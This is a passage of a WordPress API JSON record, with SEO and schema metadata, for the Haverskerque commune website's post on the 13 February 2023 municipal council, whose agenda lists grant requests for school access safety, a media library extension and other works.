ListItem\",\"position\":2,\"name\":\"Conseil municipal du 13 f\u00e9vrier 2023\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"name\":\"Haverskerque\",\"description\":\"Haverskerque, 100% Nature !\",\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"alternateName\":\"Haverskerque\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/haverskerque.fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\",\"name\":\"Commune d'Haverskerque\",\"alternateName\":\"Commune d'Haverskerque\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"contentUrl\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"width\":236,\"height\":102,\"caption\":\"Commune d'Haverskerque\"},\"image\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/communehaverskerque\",\"https:\\\/\\\/www.instagram.com\\\/communehaverskerque\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\",\"name\":\"chti pc en d\u00e9tresse\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"caption\":\"chti pc en d\u00e9tresse\"},\"sameAs\":[\"https:\\\/\\\/haverskerque.fr\"],\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/author\\\/estorez\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Conseil municipal du 13 f\u00e9vrier 2023 * Haverskerque, 100% Nature !*","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.haverskerque.fr\/index.php\/2023\/02\/14\/conseil-municipal-du-13-fevrier-2023\/","og_locale":"fr_FR","og_type":"article","og_title":"Conseil municipal du 13 f\u00e9vrier 2023 * Haverskerque, 100% Nature !*","og_description":"ORDRE DU JOUR FINANCES 1. DSIL &#8211; Sollicitation de la Dotation de soutien \u00e0 l\u2019investissement local (DSIL) 2023 au titre des d\u00e9penses d\u2019investissement dans le cadre de l\u2019am\u00e9nagement et de la s\u00e9curisation de l\u2019acc\u00e8s aux services p\u00e9riscolaires et \u00e0 l\u2019\u00e9cole Saint-Exup\u00e9ry. 2. DRAC &#8211; Sollicitation de la dotation g\u00e9n\u00e9rale de d\u00e9centralisation (DGD) 2023 pour les biblioth\u00e8ques au titre des d\u00e9penses d\u2019investissement de l\u2019extension et de la cr\u00e9ation d\u2019un tiers-lieu en m\u00e9diath\u00e8que M\u00e9di@Lys. 3. R\u00e9gion Hauts-de-France &#8211; Sollicitation de l\u2019aide aux Communes et aux Territoires (ACTes) 2023 au titre des d\u00e9penses d\u2019investissement de l\u2019extension et de la cr\u00e9ation d\u2019un tiers-lieu en m\u00e9diath\u00e8que M\u00e9di@Lys. 4. D\u00e9partement du Nord &#8211; Sollicitation de l\u2019Aide \u00e0 la S\u00e9curisation des Routes D\u00e9partementales en Agglom\u00e9ration (ASRDA) 2023 au titre des d\u00e9penses d\u2019investissement dans le cadre de la s\u00e9curisation de l\u2019acc\u00e8s pi\u00e9tonnier aux services p\u00e9riscolaires et \u00e0 l\u2019\u00e9cole Saint-Exup\u00e9ry. 5. CCFL &#8211; Sollicitation du fonds de concours au titre des d\u00e9penses d\u2019investissement dans le cadre de la s\u00e9curisation de l\u2019acc\u00e8s pi\u00e9tonnier aux services p\u00e9riscolaires et \u00e0 l\u2019\u00e9cole Saint-Exup\u00e9ry. 6. CCFL &#8211; Sollicitation du fonds de concours au titre des d\u00e9penses d\u2019investissement du projet de lutte contre le gaspillage alimentaire. 7. CCFL &#8211; Sollicitation du fonds de concours au titre des d\u00e9penses d\u2019investissement de l\u2019extension et de la cr\u00e9ation d\u2019un tiers-lieu en m\u00e9diath\u00e8que M\u00e9di@Lys. 8.. CCFL &#8211; Sollicitation du fonds de concours au titre des d\u00e9penses d\u2019investissement d\u2019am\u00e9nagement du chemin pi\u00e9tonnier en sortie d\u2019agglom\u00e9ration le long de la D916 &#8211; Travaux suppl\u00e9mentaires en bordures des habitations. 9. CCFL &#8211; Sollicitation du fonds de concours au titre des d\u00e9penses d\u2019investissement de mobilier de bureau. 10. CCFL &#8211; Sollicitation du fonds de concours au titre des d\u00e9penses d\u2019investissement de mat\u00e9riels techniques.","og_url":"https:\/\/www.haverskerque.fr\/index.php\/2023\/02\/14\/conseil-municipal-du-13-fevrier-2023\/","og_site_name":"Haverskerque, 100% Nature !*","article_publisher":"https:\/\/www.facebook.com\/communehaverskerque","article_published_time":"2023-02-14T11:56:13+00:00","article_modified_time":"2024-07-29T04:38:24+00:00","og_image":[{"width":1200,"height":630,"url":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","type":"image\/jpeg"}],"author":"chti pc en d\u00e9tresse","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"chti pc en d\u00e9tresse","Dur\u00e9e de lecture estim\u00e9e":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/02\/14\/conseil-municipal-du-13-fevrier-2023\/#article","isPartOf":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/02\/14\/conseil-municipal-du-13-fevrier-2023\/"},"author":{"name":"chti pc en d\u00e9tresse","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2"},"headline":"Conseil municipal du 13 f\u00e9vrier 2023","datePublished":"2023-02-14T11:56:13+00:00","dateModified":"2024-07-29T04:38:24+00:00","mainEntityOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/02\/14\/conseil-municipal-du-13-fevrier-2023\/"},"wordCount":369,"publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/02\/14\/conseil-municipal-du-13-fevrier-2023\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","articleSection":["Conseil municipal"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/02\/14\/conseil-municipal-du-13-fevrier-2023\/","url":"https:\/\/www.haverskerque.fr\/index.php\/2023\/02\/14\/conseil-municipal-du-13-fevrier-2023\/","name":"Conseil municipal du 13 f\u00e9vrier 2023 * Haverskerque, 100% Nature !*","isPartOf":{"@id":"https:\/\/haverskerque.fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/02\/14\/conseil-municipal-du-13-fevrier-2023\/#primaryimage"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/02\/14\/conseil-municipal-du-13-fevrier-2023\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","datePublished":"2023-02-14T11:56:13+00:00","dateModified":"2024-07-29T04:38:24+00:00","breadcrumb":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/02\/14\/conseil-municipal-du-13-fevrier-2023\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.haverskerque.fr\/index.php\/2023\/02\/14\/conseil-municipal-du-13-fevrier-2023\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/02\/14\/conseil-municipal-du-13-fevrier-2023\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.haverskerque.fr\/"},{"@type":"ListItem","position":2,"name":"Conseil municipal du 13 f\u00e9vrier 2023"}]},{"@type":"WebSite","@id":"https:\/\/haverskerque.fr\/#website","url":"https:\/\/haverskerque.fr\/","name":"Haverskerque","description":"Haverskerque, 100% Nature !","publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"alternateName":"Haverskerque","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/haverskerque.fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/haverskerque.fr\/#organization","name":"Commune d'Haverskerque","alternateName":"Commune d'Haverskerque","url":"https:\/\/haverskerque.fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/","url":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","contentUrl":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","width":236,"height":102,"caption":"Commune d'Haverskerque"},"image":{"@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/communehaverskerque","https:\/\/www.instagram.com\/communehaverskerque\/"]},{"@type":"Person","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2","name":"chti pc en d\u00e9tresse","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","caption":"chti pc en d\u00e9tresse"},"sameAs":["https:\/\/haverskerque.fr"],"url":"https:\/\/www.haverskerque.fr\/index.php\/author\/estorez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/565","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/comments?post=565"}],"version-history":[{"count":5,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/565\/revisions"}],"predecessor-version":[{"id":8289,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/565\/revisions\/8289"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media\/568"}],"wp:attachment":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media?parent=565"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/categories?post=565"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/tags?post=565"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}